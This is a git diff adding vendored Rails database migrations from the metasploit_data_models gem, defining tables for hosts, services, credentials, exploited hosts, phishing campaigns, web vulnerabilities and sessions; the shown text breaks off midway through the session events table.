diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/017_expand_info2.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/017_expand_info2.rb
new file mode 100755
index 0000000000..cee6fd8d3b
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/017_expand_info2.rb
@@ -0,0 +1,58 @@
+class ExpandInfo2 < ActiveRecord::Migration
+ def self.up
+ remove_column :events, :info
+ change_table :events do |t|
+ t.string :info, :limit => 65536
+ end
+
+ remove_column :notes, :data
+ change_table :notes do |t|
+ t.string :data, :limit => 65536
+ end
+
+ remove_column :vulns, :data
+ change_table :vulns do |t|
+ t.string :data, :limit => 65536
+ end
+
+ remove_column :hosts, :info
+ change_table :hosts do |t|
+ t.string :info, :limit => 65536
+ end
+
+ remove_column :services, :info
+ change_table :services do |t|
+ t.string :info, :limit => 65536
+ end
+ end
+
+ def self.down
+
+ remove_column :events, :info
+ change_table :events do |t|
+ t.string :info
+ end
+
+ remove_column :notes, :data
+ change_table :notes do |t|
+ t.string :data, :limit => 4096
+ end
+
+ remove_column :hosts, :info
+ change_table :hosts do |t|
+ t.string :info, :limit => 4096
+ end
+
+ remove_column :vulns, :data
+ change_table :vulns do |t|
+ t.string :data, :limit => 4096
+ end
+
+ remove_column :services, :info
+ change_table :services do |t|
+ t.string :info, :limit => 4096
+ end
+
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/018_add_workspace_user_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/018_add_workspace_user_info.rb
new file mode 100755
index 0000000000..fb5e101fc3
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/018_add_workspace_user_info.rb
@@ -0,0 +1,29 @@
+class AddWorkspaceUserInfo < ActiveRecord::Migration
+ def self.up
+ change_table :workspaces do |t|
+ t.string :boundary, :limit => 4096
+ end
+
+ change_table :users do |t|
+ t.string :fullname
+ t.string :email
+ t.string :phone
+ t.string :company
+ end
+ end
+
+ def self.down
+ change_table :workspaces do |t|
+ t.remove :boundary
+ end
+
+ change_table :users do |t|
+ t.remove :fullname
+ t.remove :email
+ t.remove :phone
+ t.remove :company
+ end
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/019_add_workspace_desc.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/019_add_workspace_desc.rb
new file mode 100755
index 0000000000..0dc31f0c61
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/019_add_workspace_desc.rb
@@ -0,0 +1,23 @@
+class AddWorkspaceDesc < ActiveRecord::Migration
+ def self.up
+ change_table :workspaces do |t|
+ t.string :description, :limit => 4096
+ end
+
+ change_table :hosts do |t|
+ t.string :comments, :limit => 4096
+ end
+ end
+
+ def self.down
+ change_table :workspaces do |t|
+ t.remove :description
+ end
+
+ change_table :hosts do |t|
+ t.remove :comments
+ end
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/020_add_user_preferences.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/020_add_user_preferences.rb
new file mode 100755
index 0000000000..40b472701c
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/020_add_user_preferences.rb
@@ -0,0 +1,11 @@
+class AddUserPreferences < ActiveRecord::Migration
+ def self.up
+ add_column :users, :prefs, :string, :limit => 524288
+ end
+
+ def self.down
+ remove_column :users, :prefs
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/021_standardize_info_and_data.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/021_standardize_info_and_data.rb
new file mode 100755
index 0000000000..bb9a2bccd6
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/021_standardize_info_and_data.rb
@@ -0,0 +1,18 @@
+class StandardizeInfoAndData < ActiveRecord::Migration
+ def self.up
+ # Remove the host requirement. We'll add the column back in below.
+ remove_column :vulns, :data
+ change_table :vulns do |t|
+ t.string :info, :limit => 65536
+ end
+ end
+
+ def self.down
+ remove_column :vulns, :info
+ change_table :notes do |t|
+ t.string :data, :limit => 65536
+
+ end
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/022_enlarge_event_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/022_enlarge_event_info.rb
new file mode 100755
index 0000000000..fec9698c06
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/022_enlarge_event_info.rb
@@ -0,0 +1,10 @@
+class EnlargeEventInfo < ActiveRecord::Migration
+ def self.up
+ change_column :events, :info, :text
+ end
+
+ def self.down
+ change_column :events, :info, :string, :limit => 65535
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/023_add_report_downloaded_at.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/023_add_report_downloaded_at.rb
new file mode 100755
index 0000000000..7ec5716e82
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/023_add_report_downloaded_at.rb
@@ -0,0 +1,10 @@
+class AddReportDownloadedAt < ActiveRecord::Migration
+ def self.up
+ add_column :reports, :downloaded_at, :timestamp
+ end
+
+ def self.down
+ remove_column :reports, :downloaded_at
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/024_convert_service_info_to_text.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/024_convert_service_info_to_text.rb
new file mode 100755
index 0000000000..14f0a96222
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/024_convert_service_info_to_text.rb
@@ -0,0 +1,12 @@
+class ConvertServiceInfoToText < ActiveRecord::Migration
+
+ def self.up
+ change_column :services, :info, :text
+ end
+
+ def self.down
+ change_column :services, :info, :string, :limit => 65536
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/025_add_user_admin.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/025_add_user_admin.rb
new file mode 100755
index 0000000000..d077dbd633
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/025_add_user_admin.rb
@@ -0,0 +1,19 @@
+class AddUserAdmin < ActiveRecord::Migration
+
+ # Add user admin flag and project member list.
+ def self.up
+ add_column :users, :admin, :boolean, :default => true
+
+ create_table :project_members, :id => false do |t|
+ t.integer :workspace_id, :null => false
+ t.integer :user_id, :null => false
+ end
+ end
+
+ def self.down
+ remove_column :users, :admin
+
+ drop_table :project_members
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/026_add_creds_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/026_add_creds_table.rb
new file mode 100755
index 0000000000..381ec8373a
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/026_add_creds_table.rb
@@ -0,0 +1,19 @@
+class AddCredsTable < ActiveRecord::Migration
+ def self.up
+ create_table :creds do |t|
+ t.integer :service_id, :null => false
+ t.timestamps
+ t.string :user, :limit => 2048
+ t.string :pass, :limit => 4096
+ t.boolean :active, :default => true
+ t.string :proof, :limit => 4096
+ t.string :ptype, :limit => 16
+ t.integer :source_id
+ t.string :source_type
+ end
+ end
+ def self.down
+ drop_table :creds
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100819123300_migrate_cred_data.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100819123300_migrate_cred_data.rb
new file mode 100755
index 0000000000..d752c270f4
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100819123300_migrate_cred_data.rb
@@ -0,0 +1,154 @@
+class MigrateCredData < ActiveRecord::Migration
+
+ def self.up
+ begin # Wrap the whole thing in a giant rescue.
+ skipped_notes = []
+ new_creds = []
+ Mdm::Note.find(:all).each do |note|
+ next unless note.ntype[/^auth\.(.*)/]
+ service_name = $1
+ if !service_name
+ skipped_notes << note
+ next
+ end
+ if note.host and note.host.respond_to?(:address)
+ if note.service
+ svc_id = note.service.id
+ else
+ candidate_services = []
+ note.host.services.each do |service|
+ if service.name == service_name
+ candidate_services << service
+ end
+ end
+ # Use the default port, or the first port that matches the protocol name.
+ default_port = case service_name.downcase
+ when 'ftp'; 21
+ when /^smb/; 445
+ when /^imap/; 143
+ when 'telnet'; 23
+ when 'pop3'; 110
+ when 'http','domino','axis','wordpress','tomcat'; 80
+ when 'tns'; 1521
+ when 'snmp'; 161
+ when 'mssql'; 1433
+ when 'ssh'; 22
+ when 'https'; 443
+ when 'mysql'; 3306
+ when 'db2'; 50000
+ when 'postgres'; 5432
+ else nil
+ end
+ if !default_port
+ skipped_notes << note
+ next
+ end
+ if candidate_services.size == 1
+ svc_id = candidate_services.first.id
+ elsif candidate_services.empty?
+ Mdm::Service.new do |svc|
+ svc.host_id = note.host.id
+ svc.port = default_port
+ svc.proto = 'tcp'
+ svc.state = 'open'
+ svc.name = service_name.downcase
+ svc.save!
+ svc_id = svc.id
+ end
+ elsif candidate_services.size > 1
+ svc_ports = candidate_services.map{|s| s.port}
+ if svc_ports.index(default_port)
+ svc_id = candidate_services[svc_ports.index(default_port)].id
+ else
+ svc_id = candidate_services.first.id
+ end
+ end
+ end
+ else
+ skipped_notes << note
+ next
+ end
+ if note.data[:hash]
+ ptype = 'smb_hash'
+ pass = note.data[:hash]
+ elsif note.data[:ssh_key]
+ ptype = 'ssh_key'
+ pass = note.data[:extra]
+ else
+ ptype = 'password'
+ pass = note.data[:pass]
+ end
+ # Format domains and databases into the usernames.
+ if note.ntype == "auth.smb_challenge"
+ domain = note.data[:extra].match(/DOMAIN=([^\s]+)/)[1]
+ if domain
+ user = [domain, note.data[:user]].join("/")
+ else
+ user = note.data[:user]
+ end
+ elsif note.ntype =~ /auth\.(postgres|db2)/
+ if note.data[:database]
+ user = [note.data[:database], note.data[:user]].join("/")
+ else
+ user = note.data[:user]
+ end
+ else
+ user = note.data[:user]
+ end
+ # Not actually a credentials, convert to migrated notes
+ if service_name == 'smb' && note.data[:token]
+ skipped_notes << note
+ next
+ end
+ if service_name == 'tns' && note.data[:type] == "bruteforced_sid"
+ skipped_notes << note
+ next
+ end
+ # Special case for the bizarre reporting for aux/admin/oracle/oracle_login
+ if service_name == 'tns' && note.data[:type] == "bruteforced_account"
+ note.data[:data] =~ /([^\x2f]+)\x2f([^\s]+).*with sid (.*)/
+ user = "#{$3}/#{$1}"
+ pass = $2
+ end
+ new_creds << [svc_id, ptype, user, pass]
+ end
+
+ say "Migrating #{new_creds.size} credentials."
+ new_creds.uniq.each do |note|
+ Mdm::Cred.new do |cred|
+ cred.service_id = note[0]
+ cred.user = note[2]
+ cred.pass = note[3]
+ cred.ptype = note[1]
+ cred.save!
+ end
+ end
+
+ say "Migrating #{skipped_notes.size} notes."
+ skipped_notes.uniq.each do |note|
+ Mdm::Note.new do |new_note|
+ new_note.host_id = note.host_id
+ new_note.ntype = "migrated_auth"
+ new_note.data = note.data.merge(:migrated_auth_type => note.ntype)
+ new_note.save!
+ end
+ end
+
+ say "Deleting migrated auth notes."
+ Mdm::Note.find(:all).each do |note|
+ next unless note.ntype[/^auth\.(.*)/]
+ note.delete
+ end
+ rescue
+ say "There was a problem migrating auth credentials. Skipping."
+ return true # Never fail!
+ end
+ end
+
+
+ def self.down
+ raise ActiveRecord::IrreversibleMigration
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100824151500_add_exploited_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100824151500_add_exploited_table.rb
new file mode 100755
index 0000000000..b7897d3832
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100824151500_add_exploited_table.rb
@@ -0,0 +1,16 @@
+class AddExploitedTable < ActiveRecord::Migration
+ def self.up
+ create_table :exploited_hosts do |t|
+ t.integer :host_id, :null => false
+ t.integer :service_id
+ t.string :session_uuid, :limit => 8
+ t.string :name, :limit => 2048
+ t.string :payload, :limit => 2048
+ t.timestamps
+ end
+ end
+ def self.down
+ drop_table :exploited_hosts
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100908001428_add_owner_to_workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100908001428_add_owner_to_workspaces.rb
new file mode 100755
index 0000000000..c136d4b9d7
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100908001428_add_owner_to_workspaces.rb
@@ -0,0 +1,9 @@
+class AddOwnerToWorkspaces < ActiveRecord::Migration
+ def self.up
+ add_column :workspaces, :owner_id, :integer
+ end
+
+ def self.down
+ remove_column :workspaces, :owner_id
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100911122000_add_report_templates.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100911122000_add_report_templates.rb
new file mode 100755
index 0000000000..08b06d4c5f
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100911122000_add_report_templates.rb
@@ -0,0 +1,18 @@
+class AddReportTemplates < ActiveRecord::Migration
+
+ def self.up
+ create_table :report_templates do |t|
+ t.integer :workspace_id, :null => false, :default => 1
+ t.string :created_by
+ t.string :path, :limit => 1024
+ t.text :name
+ t.timestamps
+ end
+ end
+
+ def self.down
+ drop_table :reports
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916151530_require_admin_flag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916151530_require_admin_flag.rb
new file mode 100755
index 0000000000..d73e18425d
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916151530_require_admin_flag.rb
@@ -0,0 +1,15 @@
+class RequireAdminFlag < ActiveRecord::Migration
+
+ # Make the admin flag required.
+ def self.up
+ # update any existing records
+ Mdm::User.update_all({:admin => true}, {:admin => nil})
+
+ change_column :users, :admin, :boolean, :null => false, :default => true
+ end
+
+ def self.down
+ change_column :users, :admin, :boolean, :default => true
+ end
+
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916175000_add_campaigns_and_templates.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916175000_add_campaigns_and_templates.rb
new file mode 100755
index 0000000000..433bdcf65f
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916175000_add_campaigns_and_templates.rb
@@ -0,0 +1,61 @@
+
+class AddCampaignsAndTemplates < ActiveRecord::Migration
+
+ def self.up
+ create_table :campaigns do |t|
+ t.integer :workspace_id, :null => false
+ t.string :name, :limit => 512
+ # Serialized, stores SMTP/other protocol config options etc.
+ t.text :prefs
+ t.integer :status, :default => 0
+ t.timestamp :started_at
+ t.timestamps
+ end
+
+ create_table :email_templates do |t|
+ t.string :name, :limit => 512
+ t.string :subject, :limit => 1024
+ t.text :body
+ t.integer :parent_id
+ t.integer :campaign_id
+ end
+ create_table :attachments do |t|
+ t.string :name, :limit => 512
+ t.binary :data
+ t.string :content_type, :limit => 512
+ t.boolean :inline, :null => false, :default => true
+ t.boolean :zip, :null => false, :default => false
+ end
+ create_table :attachments_email_templates, :id => false do |t|
+ t.integer :attachment_id
+ t.integer :email_template_id
+ end
+
+ create_table :email_addresses do |t|
+ t.integer :campaign_id, :null => false
+ t.string :first_name, :limit => 512
+ t.string :last_name, :limit => 512
+ t.string :address, :limit => 512
+ t.boolean :sent, :null => false, :default => false
+ t.timestamp :clicked_at
+ end
+
+ create_table :web_templates do |t|
+ t.string :name, :limit => 512
+ t.string :title, :limit => 512
+ t.string :body, :limit => 524288
+ t.integer :campaign_id
+ end
+ end
+
+ def self.down
+ drop_table :campaigns
+ drop_table :email_templates
+ drop_table :attachments
+ drop_table :attachments_email_templates
+ drop_table :email_addresses
+ drop_table :web_templates
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100920012100_add_generate_exe_column.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100920012100_add_generate_exe_column.rb
new file mode 100755
index 0000000000..7b055b268f
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100920012100_add_generate_exe_column.rb
@@ -0,0 +1,8 @@
+class AddGenerateExeColumn < ActiveRecord::Migration
+ def self.up
+ add_column :email_templates, :generate_exe, :boolean, :null => false, :default => false
+ end
+ def self.down
+ remove_column :email_templates, :generate_exe
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100926214000_add_template_prefs.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100926214000_add_template_prefs.rb
new file mode 100755
index 0000000000..70b84d0734
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100926214000_add_template_prefs.rb
@@ -0,0 +1,11 @@
+class AddTemplatePrefs < ActiveRecord::Migration
+ def self.up
+ remove_column :email_templates, :generate_exe
+ add_column :email_templates, :prefs, :text
+ add_column :web_templates, :prefs, :text
+ end
+ def self.down
+ remove_column :email_templates, :prefs
+ remove_column :web_templates, :prefs
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101001000000_add_web_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101001000000_add_web_tables.rb
new file mode 100755
index 0000000000..e55bf286b5
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101001000000_add_web_tables.rb
@@ -0,0 +1,57 @@
+class AddWebTables < ActiveRecord::Migration
+
+ def self.up
+ create_table :web_sites do |t|
+ t.integer :service_id, :null => false
+ t.timestamps
+ t.string :vhost, :limit => 2048
+ t.text :comments
+ t.text :options
+ end
+
+ create_table :web_pages do |t|
+ t.integer :web_site_id, :null => false
+ t.timestamps
+ t.text :path
+ t.text :query
+ t.integer :code, :null => false
+ t.text :cookie
+ t.text :auth
+ t.text :ctype
+ t.timestamp :mtime
+ t.text :location
+ t.text :body
+ t.text :headers
+ end
+
+ create_table :web_forms do |t|
+ t.integer :web_site_id, :null => false
+ t.timestamps
+ t.text :path
+ t.string :method, :limit => 1024
+ t.text :params
+ end
+
+ create_table :web_vulns do |t|
+ t.integer :web_site_id, :null => false
+ t.timestamps
+ t.text :path
+ t.string :method, :limit => 1024
+ t.text :params
+ t.text :pname
+ t.text :proof
+ t.integer :risk
+ t.string :name, :limit => 1024
+ end
+
+ end
+
+ def self.down
+ drop_table :web_sites
+ drop_table :web_pages
+ drop_table :web_forms
+ drop_table :web_vulns
+ end
+end
+
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101002000000_add_query.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101002000000_add_query.rb
new file mode 100755
index 0000000000..f22d0f2954
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101002000000_add_query.rb
@@ -0,0 +1,10 @@
+class AddQuery < ActiveRecord::Migration
+ def self.up
+ add_column :web_forms, :query, :text
+ add_column :web_vulns, :query, :text
+ end
+ def self.down
+ remove_column :web_forms, :query
+ remove_column :web_vulns, :query
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101007000000_add_vuln_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101007000000_add_vuln_info.rb
new file mode 100755
index 0000000000..34c1eb3fd9
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101007000000_add_vuln_info.rb
@@ -0,0 +1,15 @@
+class AddVulnInfo < ActiveRecord::Migration
+ def self.up
+ add_column :web_vulns, :category, :text
+ add_column :web_vulns, :confidence, :text
+ add_column :web_vulns, :description, :text
+ add_column :web_vulns, :blame, :text
+ end
+ def self.down
+ remove_column :web_forms, :category
+ remove_column :web_vulns, :confidence
+ remove_column :web_vulns, :description
+ remove_column :web_vulns, :blame
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101008111800_add_clients_to_campaigns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101008111800_add_clients_to_campaigns.rb
new file mode 100755
index 0000000000..6281f91343
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101008111800_add_clients_to_campaigns.rb
@@ -0,0 +1,10 @@
+
+class AddClientsToCampaigns < ActiveRecord::Migration
+ def self.up
+ add_column :clients, :campaign_id, :integer
+ end
+
+ def self.down
+ remove_column :clients, :campaign_id
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101009023300_add_campaign_attachments.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101009023300_add_campaign_attachments.rb
new file mode 100755
index 0000000000..6baf770f29
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101009023300_add_campaign_attachments.rb
@@ -0,0 +1,15 @@
+
+
+class AddCampaignAttachments < ActiveRecord::Migration
+
+ def self.up
+ add_column :attachments, :campaign_id, :integer
+ end
+
+ def self.down
+ remove_column :attachments, :campaign_id
+ end
+
+end
+
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101104135100_add_imported_creds.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101104135100_add_imported_creds.rb
new file mode 100755
index 0000000000..92eb12d474
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101104135100_add_imported_creds.rb
@@ -0,0 +1,17 @@
+class AddImportedCreds < ActiveRecord::Migration
+
+ def self.up
+ create_table :imported_creds do |t|
+ t.integer :workspace_id, :null => false, :default => 1
+ t.string :user, :limit => 512
+ t.string :pass, :limit => 512
+ t.string :ptype, :limit => 16, :default => "password"
+ end
+ end
+
+ def self.down
+ drop_table :imported_creds
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000000_fix_web_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000000_fix_web_tables.rb
new file mode 100755
index 0000000000..2056369ed7
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000000_fix_web_tables.rb
@@ -0,0 +1,34 @@
+class FixWebTables < ActiveRecord::Migration
+
+ def self.up
+ change_column :web_pages, :path, :text
+ change_column :web_pages, :query, :text
+ change_column :web_pages, :cookie, :text
+ change_column :web_pages, :auth, :text
+ change_column :web_pages, :ctype, :text
+ change_column :web_pages, :location, :text
+ change_column :web_pages, :path, :text
+ change_column :web_vulns, :path, :text
+ change_column :web_vulns, :pname, :text
+
+ add_column :web_pages, :request, :text
+ add_column :web_vulns, :request, :text
+ end
+
+ def self.down
+ change_column :web_pages, :path, :text
+ change_column :web_pages, :query, :text
+ change_column :web_pages, :cookie, :text
+ change_column :web_pages, :auth, :text
+ change_column :web_pages, :ctype, :text
+ change_column :web_pages, :location, :text
+ change_column :web_pages, :path, :text
+ change_column :web_vulns, :path, :text
+ change_column :web_vulns, :pname, :text
+
+ remove_column :web_pages, :request
+ remove_column :web_vulns, :request
+ end
+end
+
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000001_expand_host_comment.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000001_expand_host_comment.rb
new file mode 100755
index 0000000000..1a0bc1bc51
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000001_expand_host_comment.rb
@@ -0,0 +1,12 @@
+class ExpandHostComment < ActiveRecord::Migration
+
+ def self.up
+ change_column :hosts, :comments, :text
+ end
+
+ def self.down
+ change_column :hosts, :comments, :string, :limit => 4096
+ end
+end
+
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb
new file mode 100755
index 0000000000..7365e14f9d
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb
@@ -0,0 +1,9 @@
+class AddLimitToNetworkToWorkspaces < ActiveRecord::Migration
+ def self.up
+ add_column :workspaces, :limit_to_network, :boolean, :null => false, :default => false
+ end
+
+ def self.down
+ remove_column :workspaces, :limit_to_network
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110112154300_add_module_uuid_to_tasks.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110112154300_add_module_uuid_to_tasks.rb
new file mode 100755
index 0000000000..f41bc6a813
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110112154300_add_module_uuid_to_tasks.rb
@@ -0,0 +1,9 @@
+class AddModuleUuidToTasks < ActiveRecord::Migration
+ def self.up
+ add_column :tasks, :module_uuid, :string, :limit => 8
+ end
+
+ def self.down
+ remove_column :tasks, :module_uuid
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110204112800_add_host_tags.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110204112800_add_host_tags.rb
new file mode 100755
index 0000000000..d07c885c35
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110204112800_add_host_tags.rb
@@ -0,0 +1,28 @@
+class AddHostTags < ActiveRecord::Migration
+
+ def self.up
+
+ create_table :tags do |t|
+ t.integer :user_id
+ t.string :name, :limit => 1024
+ t.text :desc
+ t.boolean :report_summary, :null => false, :default => false
+ t.boolean :report_detail, :null => false, :default => false
+ t.boolean :critical, :null => false, :default => false
+ t.timestamps
+ end
+
+ create_table :hosts_tags, :id => false do |t|
+ t.integer :host_id
+ t.integer :tag_id
+ end
+
+ end
+
+ def self.down
+ drop_table :hosts_tags
+ drop_table :tags
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110317144932_add_session_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110317144932_add_session_table.rb
new file mode 100755
index 0000000000..15ac8852bb
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110317144932_add_session_table.rb
@@ -0,0 +1,110 @@
+class AddSessionTable < ActiveRecord::Migration
+
+ class Event < ActiveRecord::Base
+ serialize :info
+ end
+
+ class SessionEvent < ActiveRecord::Base
+ belongs_to :session
+ end
+
+ class Session < ActiveRecord::Base
+ has_many :events, :class_name => 'AddSessionTable::SessionEvent'
+ serialize :datastore
+ end
+
+ def self.up
+
+ create_table :sessions do |t|
+ t.integer :host_id
+
+ t.string :stype # session type: meterpreter, shell, etc
+ t.string :via_exploit # module name
+ t.string :via_payload # payload name
+ t.string :desc # session description
+ t.integer :port
+ t.string :platform # platform type of the remote system
+ t.string :routes
+
+ t.text :datastore # module's datastore
+
+ t.timestamp :opened_at, :null => false
+ t.timestamp :closed_at
+
+ t.string :close_reason
+ end
+
+ create_table :session_events do |t|
+ t.integer :session_id
+
+ t.string :etype # event type: command, output, upload, download, filedelete
+ t.binary :command
+ t.binary :output
+ t.string :remote_path
